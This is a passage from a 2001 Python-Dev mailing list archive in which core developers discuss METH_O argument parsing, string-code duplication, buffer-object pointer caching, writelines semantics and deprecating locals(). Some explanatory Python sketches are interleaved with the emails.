> in the builtins, the relative cost of the argument processing will be
> lower.

Certainly: If the work inside the function increases, the overhead of
calling it will be less visible. What the benchmark shows, however,
and what my patch addresses, is that the time for *calling* a function
is primarily spent in PyArg_ParseTuple (and not in, say, building
argument tuples, putting parameters on the stack, fetching function
addresses, building method objects, and so on).
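Jeremy's observation that the format string is a static property of the code suggests parsing it once rather than on every call. Below is a minimal Python sketch of that idea. It handles only the `O`, `|` and `:name` parts of the format language (not codes like `O!`, `i` or `s#`), and `compile_format` is a hypothetical helper, not part of any Python API.

```python
def compile_format(fmt):
    """Parse an 'O'-only format such as 'OO|O:getattr' once and return a
    checker specialised for it (hypothetical helper)."""
    spec, _, name = fmt.partition(":")
    required, _, optional = spec.partition("|")
    if set(required + optional) - {"O"}:
        raise ValueError("only 'O' codes are handled in this sketch")
    lo, hi = len(required), len(required) + len(optional)
    label = "%s()" % name if name else "function"

    def check(args):
        # per-call work is now just a length comparison
        if not lo <= len(args) <= hi:
            raise TypeError("%s takes %d to %d arguments (%d given)"
                            % (label, lo, hi, len(args)))
        return tuple(args)
    return check

check_getattr = compile_format("OO|O:getattr")
```

All the string scanning happens in `compile_format`; the returned `check` does no parsing at all, which is the cost Martin's measurements attribute to PyArg_ParseTuple.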

Regards,
Martin


From tim.one@home.com  Mon May 28 00:17:27 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 27 May 2001 19:17:27 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <20010528005058.H690@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCIENAKEAA.tim.one@home.com>

[Thomas Wouters]
> And don't forget the method-specific error message by passing ':len' in
> the format string. Of course, this can easily be (and probably should be)
> done by passing another argument to whatever parses arguments in
> METH_O, rather than invoking string parsing magic every call.

Martin's patch automatically inserts the name of the function in the
TypeError it raises when a METH_O call doesn't get exactly one argument, or
gets one or more keyword arguments.

Stick to METH_O and it's a clear win, even in this respect:  there's no info
in an explicit ":len" he's not already deducing, and almost all instances of
"O:name" formats today are exactly the same this way:

if (!PyArg_ParseTuple(args, "O:abs", &v))
if (!PyArg_ParseTuple(args, "O:callable", &v))
if (!PyArg_ParseTuple(args, "O:id", &v))
if (!PyArg_ParseTuple(args, "O:hash", &v))
if (!PyArg_ParseTuple(args, "O:hex", &v))
if (!PyArg_ParseTuple(args, "O:float", &v))
if (!PyArg_ParseTuple(args, "O:len", &v))
if (!PyArg_ParseTuple(args, "O:list", &v))
else if (!PyArg_ParseTuple(args, "O:min/max", &v))
if (!PyArg_ParseTuple(args, "O:oct", &v))
if (!PyArg_ParseTuple(args, "O:ord", &obj))
if (!PyArg_ParseTuple(args, "O:reload", &v))
if (!PyArg_ParseTuple(args, "O:repr", &v))
if (!PyArg_ParseTuple(args, "O:str", &v))
if (!PyArg_ParseTuple(args, "O:tuple", &v))
if (!PyArg_ParseTuple(args, "O:type", &v))

Those are all the ones in bltinmodule.c, and nearly all of them are called
extremely frequently in *some* programs.  The only oddball is min/max, but
then it supports more than one call-list format and so isn't a METH_O
candidate anyway.  Indeed, Martin's patch gives a *better* message than we
get for some mistakes today:

>>> len(val=2)
Traceback (most recent call last):
 File "<stdin>", line 1, in ?
TypeError: len() takes exactly 1 argument (0 given)
>>>

Martin's would say

    TypeError: len takes no keyword arguments

in this case.  He should add "()" after the function name.  He should also
throw away the half of the patch complicating and slowing METH_O to get some
theoretical speedup in other cases:  make the one-arg builtins fly just as
fast as humanly possible.


From greg@cosc.canterbury.ac.nz  Mon May 28 01:23:55 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 28 May 2001 12:23:55 +1200 (NZST)
Subject: [Python-Dev] strop vs. string
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPKEBIDOAA.MarkH@ActiveState.com>
Message-ID: <200105280023.MAA00996@s454.cosc.canterbury.ac.nz>

> However, it has one fatal flaw, and no one seems
> to know what to do about it.

I think it would be safe if:

1) it kept a reference to the underlying object, and

2) it re-fetched the pointer and length info each time it was
   needed, using the underlying object's buffer interface.
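Python has no raw pointers, but the hazard and Greg's proposed fix can be imitated with a `bytearray` that is resized after a view has been taken. Both classes are hypothetical stand-ins. `CachingView` records the length once, as the buffer object caches its pointer and size. `RefetchingView` keeps a reference and asks the underlying object again on every access.

```python
class CachingView:
    """Captures the size once; goes stale if the object is resized."""
    def __init__(self, obj):
        self.obj = obj
        self.size = len(obj)

    def __len__(self):
        return self.size


class RefetchingView:
    """Keeps a reference and re-reads the object's state on every use."""
    def __init__(self, obj):
        self.obj = obj

    def __len__(self):
        return len(self.obj)

    def __getitem__(self, i):
        return self.obj[i]


data = bytearray(b"hello")
stale, fresh = CachingView(data), RefetchingView(data)
del data[2:]            # shrink the underlying object
```

After the shrink, `len(stale)` still reports 5; in C, indexing up to that stale size would read memory the object no longer owns. The refetching view stays correct, at the price of an extra lookup on every access.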

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Mon May 28 01:28:41 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 28 May 2001 12:28:41 +1200 (NZST)
Subject: [Python-Dev] strop vs. string
In-Reply-To: <20010525132752.B5402@lyra.org>
Message-ID: <200105280028.MAA01000@s454.cosc.canterbury.ac.nz>

Greg Stein <gstein@lyra.org>

> "badly" is overstating the problem. It caches a pointer when it shouldn't.
> This doesn't work well

But "doesn't work well" means "can crash the interpreter".
I don't think "badly" is an overstatement here...

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From tim.one@home.com  Mon May 28 02:42:30 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 27 May 2001 21:42:30 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B10D758.3741AC2F@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMENEKEAA.tim.one@home.com>

[MAL]
> I guess there are three ways to "solve" this:
>
> a) mutable types don't implement the getreadbuf interface

Of the few types that implement it today, that would leave only strings
(8-bit and Unicode).  Too much machinery just for that.  Besides, I once
posted an example to c.l.py showing how to use regexps to search mmap'ed
files, so *that* must continue to work forever <wink>.

> b) the getreadbuf interface is complemented with a callback
>    interface, so that the buffer object can be notified of
>    the change

I like this best, although there's no bound on the number of buffers that
may need to be notified in case of change (i.e., the object would need to
maintain a list of buffers to be notified).
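Option (b) amounts to the observer pattern. Here is a minimal sketch, assuming a hypothetical `NotifyingBuffer` owner. The owner tracks its views in a `weakref.WeakSet`, so views that go away need not unregister themselves, and tells each view to refresh after a resize. As Tim notes, the owner has to keep a collection of views because nothing bounds how many exist.

```python
import weakref


class NotifyingBuffer:
    """Mutable object that notifies registered views when it changes."""
    def __init__(self, data):
        self.data = bytearray(data)
        self._views = weakref.WeakSet()

    def register(self, view):
        self._views.add(view)

    def truncate(self, n):
        del self.data[n:]
        for view in list(self._views):   # copy: the set may shrink meanwhile
            view.refresh()


class View:
    """Caches the size for speed, but is told when the cache is stale."""
    def __init__(self, owner):
        self.owner = owner
        self.refresh()
        owner.register(self)

    def refresh(self):
        self.size = len(self.owner.data)


owner = NotifyingBuffer(b"hello")
views = [View(owner), View(owner)]
owner.truncate(2)
```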

> c) calling getreadbuf on a mutable object causes this object
>    to become immutable

Even easier, core dump as soon as getreadbuf is called <wink>.

[Greg Ewing]
> I think it would be safe if:
>
> 1) it kept a reference to the underlying object, and

That much it already does.

> 2) it re-fetched the pointer and length info each time it was
>    needed, using the underlying object's buffer interface.

If after

    b = buffer(some_object)

b.__getitem__ needed to refetch the info between

    b[i]
and
    b[i+1]

I expect it would be so slow even Greg wouldn't want it anymore.


From tim.one@home.com  Mon May 28 02:52:18 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 27 May 2001 21:52:18 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0FD023.C4588919@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGENFKEAA.tim.one@home.com>

[Tim]
> About combining strop and buffers and strings, don't forget
> unicodeobject.c:  that's got oodles of basically duplicate code too.
> /F suggested dealing with the minor differences via maintaining one
> code file that gets compiled multiple times w/ appropriate #defines.

[MAL]
> Hmm, that only saves us a few kB in source, but certainly not
> in the object files.

That's not the point.  Manually duplicated code blocks always get out of
synch, as people fix bugs in, or enhance, one of them but don't even know
about the others.  /F brought this up after I pissed away a few hours trying
to repair one of these in all places, and he noted that strop.replace() and
string.replace() are woefully inefficient anyway.

> The better idea would be making the types subclass from a generic
> abstract string object -- I just don't know how this will be
> possible with Guido's type patches. We'll just have to wait,
> I guess.

Wait for what?  If it were possible, is the chance that you'd take time to
rework unicodeobject.c to "subclass from a generic abstract string object"
greater than 0?  The chance that I would is exactly 0.


From martin@loewis.home.cs.tu-berlin.de  Mon May 28 07:36:49 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 28 May 2001 08:36:49 +0200
Subject: [Python-Dev] Special-casing "O"
Message-ID: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>

> How is METH_O different than METH_OLDARGS? 

METH_O will raise an exception if the function is called with more
than one argument, without calling the function. METH_OLDARGS will
pass a tuple in this case.

I believe you cannot distinguish between a single tuple argument and
an invocation with multiple arguments in a METH_OLDARGS function, is
that true?

Regards,
Martin


From martin@loewis.home.cs.tu-berlin.de  Mon May 28 08:40:54 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 28 May 2001 09:40:54 +0200
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
Message-ID: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>

When investigating calling conventions, I took a special look at
METH_OLDARGS occurrences. While most of them look reasonable,
file.writelines caught my attention. It has

	if (args == NULL || !PySequence_Check(args)) {
		PyErr_SetString(PyExc_TypeError,
			   "writelines() argument must be a sequence of strings");
		return NULL;
	}

Because it is a METH_OLDARGS method, you can do

f=open("/tmp/x","w")
f.writelines("foo\n","bar\n")

With my upcoming patches, I'd replace this with METH_O, making this
call illegal. Does anybody see a problem with that change in
semantics?
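For comparison, in Python 3 `writelines()` accepts exactly one iterable of strings, so the multi-argument spelling is rejected with a TypeError. A single string still works because it is itself a sequence of one-character strings. A small check using `io.StringIO`:

```python
import io

buf = io.StringIO()
buf.writelines(["foo\n", "bar\n"])   # intended use: one sequence argument
buf.writelines("baz\n")              # a lone str is a sequence of 1-char strs

try:
    buf.writelines("foo\n", "bar\n") # the spelling Martin wants to outlaw
    rejected = False
except TypeError:
    rejected = True
```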

Regards,
Martin


From thomas@xs4all.net  Mon May 28 09:17:58 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Mon, 28 May 2001 10:17:58 +0200
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 28, 2001 at 09:40:54AM +0200
References: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>
Message-ID: <20010528101758.K690@xs4all.nl>

On Mon, May 28, 2001 at 09:40:54AM +0200, Martin v. Loewis wrote:

> When investigating calling conventions, I took a special look at
> METH_OLDARGS occurrences. While most of them look reasonable,
> file.writelines caught my attention. It has

> 	if (args == NULL || !PySequence_Check(args)) {
> 		PyErr_SetString(PyExc_TypeError,
> 			   "writelines() argument must be a sequence of strings");
> 		return NULL;
> 	}

> Because it is a METH_OLDARGS method, you can do

> f=open("/tmp/x","w")
> f.writelines("foo\n","bar\n")

> With my upcoming patches, I'd replace this with METH_O, making this
> call illegal. Does anybody see a problem with that change in
> semantics?

Hell yeah. About the same problem as with the 'l.append("foo", "bar")'
problem in 1.5.2 -> [1.6, 2.x]. Oddly enough, this behaviour was added in
2.0, by converting a PyList_Check into a PySequence_Check:

$ python1.5
>>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n")
Traceback (innermost last):
  File "<stdin>", line 1, in ?
TypeError: writelines() requires list of strings

$ python2.0
>>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n")
>>> 

I do think we'll have to allow for this for one more release, with warnings
and all. It's extremely unlikely that anyone is using this, but changing it
without warning will definitely not benefit 2.x's image wrt. stability ;P

If bugfix-releases were allowed to generate additional warnings, I'd add a
warning to 2.1.1....
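One way to allow the old spelling for one more release, as Thomas suggests, is a shim that accepts several arguments but issues a DeprecationWarning. The function below is hypothetical. It takes a plain `write` callable rather than a real file object so it can run anywhere.

```python
import warnings


def writelines_compat(write, *args):
    """Hypothetical transition shim for writelines()."""
    if not args:
        raise TypeError("writelines() requires a sequence argument")
    if len(args) == 1:
        lines = args[0]
    else:
        warnings.warn("writelines() with several arguments is deprecated; "
                      "pass a single sequence instead",
                      DeprecationWarning, stacklevel=2)
        lines = args
    for line in lines:
        write(line)


out = []
with warnings.catch_warnings(record=True) as caught:
    warnings.simplefilter("always")
    writelines_compat(out.append, ["a\n"])       # new style: silent
    writelines_compat(out.append, "b\n", "c\n")  # old style: warns
```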

-- 
Thomas Wouters <thomas@xs4all.net>



From mal@lemburg.com  Mon May 28 10:04:51 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Mon, 28 May 2001 11:04:51 +0200
Subject: [Python-Dev] strop vs. string
References: <LNBBLJKPBEHFEDALKOLCGENFKEAA.tim.one@home.com>
Message-ID: <3B1214B3.9A4C295D@lemburg.com>

Tim Peters wrote:
> 
> [Tim]
> > About combining strop and buffers and strings, don't forget
> > unicodeobject.c:  that's got oodles of basically duplicate code too.
> > /F suggested dealing with the minor differences via maintaining one
> > code file that gets compiled multiple times w/ appropriate #defines.
> 
> [MAL]
> > Hmm, that only saves us a few kB in source, but certainly not
> > in the object files.
> 
> That's not the point.  Manually duplicated code blocks always get out of
> synch, as people fix bugs in, or enhance, one of them but don't even know
> about the others.  /F brought this up after I pissed away a few hours trying
> to repair one of these in all places, and he noted that strop.replace() and
> string.replace() are woefully inefficient anyway.

Ok, so what we'd need is a bunch of generic low-level string 
operations: one set for 8-bit and one for 16-bit code. 

Looking at unicodeobject.c it seems that the section "Helpers" would
be a good start, plus perhaps a few bits from the method implementations
refactored to form a low-level string template library.

Perhaps we should move this code into
a file stringhelpers.h which then gets included by stringobject.c
and unicodeobject.c with appropriate #defines set up for
8-bit strings and for Unicode.
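Python itself can't show the #include-with-#defines trick. The goal, though, is one implementation of a low-level helper serving both 8-bit and Unicode strings, and that can be sketched with a replace routine written once and used for both `bytes` and `str`. `replace_all` is a hypothetical name. It builds the result with a single join rather than repeated concatenation.

```python
def replace_all(s, old, new):
    """Replace every non-overlapping `old` in `s` by `new`.
    Works unchanged for str and bytes (hypothetical shared helper)."""
    if not old:
        raise ValueError("empty pattern not supported in this sketch")
    pieces, start = [], 0
    while True:
        i = s.find(old, start)
        if i < 0:
            break
        pieces.append(s[start:i])
        pieces.append(new)
        start = i + len(old)
    pieces.append(s[start:])
    return s[:0].join(pieces)   # s[:0] is '' or b'', matching the input type
```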

> > The better idea would be making the types subclass from a generic
> > abstract string object -- I just don't know how this will be
> > possible with Guido's type patches. We'll just have to wait,
> > I guess.
> 
> Wait for what?  If it were possible, is the chance that you'd take time to
> rework unicodeobject.c to "subclass from a generic abstract string object"
> greater than 0?  The chance that I would is exactly 0.

Well, that's hard to say. It would certainly be low-priority;
same for the above refactoring.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Mon May 28 10:19:16 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Mon, 28 May 2001 11:19:16 +0200
Subject: [Python-Dev] Special-casing "O"
References: <LNBBLJKPBEHFEDALKOLCIENAKEAA.tim.one@home.com>
Message-ID: <3B121814.E5E9896A@lemburg.com>

Tim Peters wrote:
> 
> [Thomas Wouters]
> > And don't forget the method-specific error message by passing ':len' in
> > the format string. Of course, this can easily be (and probably should be)
> > done by passing another argument to whatever parses arguments in
> > METH_O, rather than invoking string parsing magic every call.
> 
> Martin's patch automatically inserts the name of the function in the
> TypeError it raises when a METH_O call doesn't get exactly one argument, or
> gets one or more keyword arguments.
> 
> Stick to METH_O and it's a clear win, even in this respect:  there's no info
> in an explicit ":len" he's not already deducing, and almost all instances of
> "O:name" formats today are exactly the same this way:
> 
> if (!PyArg_ParseTuple(args, "O:abs", &v))
> if (!PyArg_ParseTuple(args, "O:callable", &v))
> if (!PyArg_ParseTuple(args, "O:id", &v))
> if (!PyArg_ParseTuple(args, "O:hash", &v))
> if (!PyArg_ParseTuple(args, "O:hex", &v))
> if (!PyArg_ParseTuple(args, "O:float", &v))
> if (!PyArg_ParseTuple(args, "O:len", &v))
> if (!PyArg_ParseTuple(args, "O:list", &v))
> else if (!PyArg_ParseTuple(args, "O:min/max", &v))
> if (!PyArg_ParseTuple(args, "O:oct", &v))
> if (!PyArg_ParseTuple(args, "O:ord", &obj))
> if (!PyArg_ParseTuple(args, "O:reload", &v))
> if (!PyArg_ParseTuple(args, "O:repr", &v))
> if (!PyArg_ParseTuple(args, "O:str", &v))
> if (!PyArg_ParseTuple(args, "O:tuple", &v))
> if (!PyArg_ParseTuple(args, "O:type", &v))
> 
> Those are all the ones in bltinmodule.c, and nearly all of them are called
> extremely frequently in *some* programs.  The only oddball is min/max, but
> then it supports more than one call-list format and so isn't a METH_O
> candidate anyway.  Indeed, Martin's patch gives a *better* message than we
> get for some mistakes today:
> 
> >>> len(val=2)
> Traceback (most recent call last):
>  File "<stdin>", line 1, in ?
> TypeError: len() takes exactly 1 argument (0 given)
> >>>
> 
> Martin's would say
> 
>     TypeError: len takes no keyword arguments
> 
> in this case.  He should add "()" after the function name.  He should also
> throw away the half of the patch complicating and slowing METH_O to get some
> theoretical speedup in other cases:  make the one-arg builtins fly just as
> fast as humanly possible.

If we end up only optimizing the re.match("O+") case, we wouldn't need 
the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick
and Martin could call the underlying API with one or more PyObject*
taken directly from the Python VM stack.

In that case, please consider at least supporting "O", "OO" and "OOO"
with optional arguments treated like I suggested in an earlier
posting (simply pass NULL and let the API take care of assigning
a default value).

This would take care of most builtins:

Python/bltinmodule.c:
--      if (!PyArg_ParseTuple(args, "OO:filter", &func, &seq))
--      if (!PyArg_ParseTuple(args, "OO:cmp", &a, &b))
--      if (!PyArg_ParseTuple(args, "OO:coerce", &v, &w))
--      if (!PyArg_ParseTuple(args, "OO:divmod", &v, &w))
--      if (!PyArg_ParseTuple(args, "OO|O:getattr", &v, &name, &dflt))
--      if (!PyArg_ParseTuple(args, "OO:hasattr", &v, &name))
--      if (!PyArg_ParseTuple(args, "OOO:setattr", &v, &name, &value))
--      if (!PyArg_ParseTuple(args, "OO:delattr", &v, &name))
--      if (!PyArg_ParseTuple(args, "OO|O:pow", &v, &w, &z))
--      if (!PyArg_ParseTuple(args, "OO|O:reduce", &func, &seq, &result))
--      if (!PyArg_ParseTuple(args, "OO:isinstance", &inst, &cls))
--      if (!PyArg_ParseTuple(args, "OO:issubclass", &derived, &cls))
--      if (!PyArg_ParseTuple(args, "O:abs", &v))
--      if (!PyArg_ParseTuple(args, "O|OO:apply", &func, &alist, &kwdict))
--      if (!PyArg_ParseTuple(args, "O:callable", &v))
--      if (!PyArg_ParseTuple(args, "O|O:complex", &r, &i))
--      if (!PyArg_ParseTuple(args, "O:id", &v))
--      if (!PyArg_ParseTuple(args, "O:hash", &v))
--      if (!PyArg_ParseTuple(args, "O:hex", &v))
--      if (!PyArg_ParseTuple(args, "O:float", &v))
--      if (!PyArg_ParseTuple(args, "O|O:iter", &v, &w))
--      if (!PyArg_ParseTuple(args, "O:len", &v))
--      if (!PyArg_ParseTuple(args, "O:list", &v))
--      if (!PyArg_ParseTuple(args, "O|OO:slice", &start, &stop, &step))
--      else if (!PyArg_ParseTuple(args, "O:min/max", &v))
--      if (!PyArg_ParseTuple(args, "O:oct", &v))
--      if (!PyArg_ParseTuple(args, "O:ord", &obj))
--      if (!PyArg_ParseTuple(args, "O:reload", &v))
--      if (!PyArg_ParseTuple(args, "O:repr", &v))
--      if (!PyArg_ParseTuple(args, "O:str", &v))
--      if (!PyArg_ParseTuple(args, "O:tuple", &v))
--      if (!PyArg_ParseTuple(args, "O:type", &v))
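MAL's "O"/"OO"/"OOO" proposal with optional trailing arguments can be sketched in Python. The dispatcher only checks the argument count and fills any missing optional slots with a marker; the callee decides what a missing argument means. In C the marker would be NULL, which can never be a valid object. The sketch uses a private sentinel for the same reason, since None is a legitimate argument value. `call_objargs`, `MISSING` and `pow_impl` are hypothetical names.

```python
MISSING = object()   # plays the role of a C NULL pointer


def call_objargs(name, func, min_args, max_args, args):
    """Hypothetical 'O', 'OO', 'OOO' dispatch with optional trailing args."""
    n = len(args)
    if not min_args <= n <= max_args:
        raise TypeError("%s() takes %d to %d arguments (%d given)"
                        % (name, min_args, max_args, n))
    padding = (MISSING,) * (max_args - n)
    return func(*(tuple(args) + padding))


def pow_impl(v, w, z):
    # the callee, not the dispatcher, supplies the default
    if z is MISSING:
        return v ** w
    return pow(v, w, z)
```

Usage: `call_objargs("pow", pow_impl, 2, 3, (2, 10))` computes 2 ** 10, while passing a third argument selects the three-argument form.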

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From jeremy@digicool.com  Mon May 28 17:45:27 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Mon, 28 May 2001 12:45:27 -0400 (EDT)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>
References: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>
Message-ID: <15122.32935.53414.174221@slothrop.digicool.com>

>>>>> "MvL" == Martin v Loewis <martin@loewis.home.cs.tu-berlin.de> writes:

  >> How is METH_O different than METH_OLDARGS?

  MvL> METH_O will raise an exception if the function is called with
  MvL> more than one argument, without calling the
  MvL> function. METH_OLDARGS will pass a tuple in this case.

Yes, I see that now.  I'm +1 on METH_O, then.

Jeremy


From tim.one@home.com  Mon May 28 18:23:47 2001
From: tim.one@home.com (Tim Peters)
Date: Mon, 28 May 2001 13:23:47 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEONKEAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> I believe you cannot distinguish between a single tuple argument and
> an invocation with multiple arguments in a METH_OLDARGS function, is
> that true?

That's the conclusion I reached after staring at the code.


From fdrake@acm.org  Mon May 28 19:20:01 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Mon, 28 May 2001 14:20:01 -0400 (EDT)
Subject: [Python-Dev] Removing doc/howto on python.org
In-Reply-To: <E14cwQ7-0003q3-00@ute.cnri.reston.va.us>
References: <E14cwQ7-0003q3-00@ute.cnri.reston.va.us>
Message-ID: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>

Andrew Kuchling writes:
 > Looking at a bug report Fred forwarded, I realized that after
 > py-howto.sourceforge.net was set up, www.python.org/doc/howto was
 > never changed to redirect to the SF site instead.  As of this
 > afternoon, that's now done; links on www.python.org have been updated,
 > and I've added the redirect.
 > 
 > Question: is it worth blowing away the doc/howto/ tree now, or should
 > it just be left there, inaccessible, until work on www.python.org
 > resumes?

Andrew,
  It looks like I never replied to this.  It's probably dropped off
your radar, but I'd say the answer is that the files on parrot should
be discarded sooner rather than later -- when we actually manage to
work on python.org we're that much more likely to have forgotten the
redirection entirely!


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake@acm.org  Mon May 28 19:33:13 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Mon, 28 May 2001 14:33:13 -0400 (EDT)
Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases)
In-Reply-To: <001c01c0aa95$55836f60$325821c0@newmexico>
References: <LNBBLJKPBEHFEDALKOLCOEMPJEAA.tim.one@home.com>
 <200103112137.QAA13084@cj20424-a.reston1.va.home.com>
 <001c01c0aa95$55836f60$325821c0@newmexico>
Message-ID: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com>

Guido wrote:
 > Actually, I intend to deprecate locals().  For now, globals() are
 > fine.  I also intend to deprecate vars(), at least in the form that is
 > equivalent to locals().

Samuele Pedroni writes:
 > That's fine with me. Will that deprecation already be active in 2.1, e.g.
 > having locals() and parameterless vars() raise a warning?
 > I imagine a (new) function that produces a snapshot of the values in the
 > local, free and cell vars of a scope can do the job required for simple
 > debugging (the copy will not allow writing the values back),
 > or another approach...

  Nothing has happened on this front yet.  Should I add deprecation
notes to the documentation while Guido is on vacation, or wait to ask
him when he gets back?  Or was this matter resolved when I wasn't
paying attention?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From tim.one@home.com  Tue May 29 00:42:05 2001
From: tim.one@home.com (Tim Peters)
Date: Mon, 28 May 2001 19:42:05 -0400
Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases)
In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEPMKEAA.tim.one@home.com>

[Guido]
> Actually, I intend to deprecate locals().  For now, globals() are
> fine.  I also intend to deprecate vars(), at least in the form that is
> equivalent to locals().

[Fred L. Drake, Jr.]
>   Nothing has happened on this front yet.  Should I add deprecation
> notes to the documentation while Guido is on vacation, or wait to ask
> him when he gets back?  Or was this matter resolved when I wasn't
> paying attention?

I advise continuing to ignore it.  Nothing was resolved, and to judge from a
trial balloon I floated on c.l.py at the time, it's not a deprecation that
will be greeted with enthusiasm.  The problems range from people doing

def f(...):
     ...
     print "..." % locals()

to people mutating locals() at module level because they simply don't
understand that globals() is the same (but correct) thing to use there.

Due to the first example, and as Samuele may <wink> have already suggested,
we at least need to implement a mapping object capturing name bindings
before we can even think about deprecating locals() for real.
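Here is a minimal sketch of such a snapshot mapping. It is written for today's Python 3, not 2.1. The helper name local_bindings is hypothetical, and it relies on CPython's sys._getframe(), which is an implementation detail. The helper copies the caller's bindings into a read-only types.MappingProxyType. The "..." % mapping idiom from the first example keeps working, but the snapshot cannot write back into the frame.

```python
import sys
from types import MappingProxyType


def local_bindings():
    """Return a read-only snapshot of the caller's local name bindings.

    Hypothetical helper; sys._getframe() is CPython-specific.
    """
    caller = sys._getframe(1)
    # dict() copies the bindings, so later rebinding in the caller is not
    # reflected; the proxy stops anyone from mutating the snapshot itself.
    return MappingProxyType(dict(caller.f_locals))


def describe(name, count):
    total = count * 2
    return "%(name)s has %(total)d items" % local_bindings()


print(describe("spam", 21))  # spam has 42 items
```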


From tim.one@home.com  Tue May 29 01:01:33 2001
From: tim.one@home.com (Tim Peters)
Date: Mon, 28 May 2001 20:01:33 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B1214B3.9A4C295D@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEPPKEAA.tim.one@home.com>

[Tim]
> Wait for what?  If it were possible, is the chance that you'd
> take time to rework unicodeobject.c to "subclass from a generic
> abstract string object" greater than 0?  The chance that I
> would is exactly 0.

[MAL]
> Well, that's hard to say. It would certainly be low-priority;
> same for the above refactoring.

I think you must have missed this when it first came up here:  /F suggested
that *he* had a non-zero chance of implementing his suggestion.  That makes
it far closer to reality than anything that's been suggested since <wink>.


From tim.one@home.com  Tue May 29 01:42:54 2001
From: tim.one@home.com (Tim Peters)
Date: Mon, 28 May 2001 20:42:54 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B121814.E5E9896A@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEAAKFAA.tim.one@home.com>

[MAL]
> If we end up only optimizing the re.match("O+") case, we wouldn't need
> the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick
> and Martin could call the underlying API with one or more PyObject*
> taken directly from the Python VM stack.

How then does the callee know it was called with the correct # of arguments?
By adding enough pointer arguments to cover the longest possible O+ string
plus 1, then verifying that the one just beyond the last one it expects is
NULL, while the ones before that are not?  Adding another "# of arguments"
member to the method table?  Inventing METH_O, METH_OO, METH_OOO, ...?
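The "# of arguments" option can be made concrete with a small Python model. Each row of the method table carries a fixed arity, and the caller checks it before dispatching. MethodEntry and call_method are hypothetical names. CPython's PyMethodDef has no such field, so this only sketches the idea under discussion. It also shows the cost Tim argues about below: the comparison is paid on every call.

```python
from typing import Callable, NamedTuple


class MethodEntry(NamedTuple):
    """Hypothetical method-table row with an explicit argument count."""
    name: str
    func: Callable
    nargs: int


def call_method(entry, *args):
    # The dispatcher validates the count once, so the callee can take its
    # arguments directly instead of parsing a tuple with a format string.
    if len(args) != entry.nargs:
        raise TypeError("%s() takes exactly %d argument(s) (%d given)"
                        % (entry.name, entry.nargs, len(args)))
    return entry.func(*args)


DIVMOD = MethodEntry("divmod", divmod, 2)
print(call_method(DIVMOD, 7, 2))  # (3, 1)
```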

> In that case, please consider at least supporting "O", "OO" and "OOO"
> with optional arguments treated like I suggested in an earlier
> posting (simply pass NULL and let the API take care of assigning
> a default value).
>
> This would take care of most builtins:

You don't have to convince me that cases other than plain "O" exist.  What's
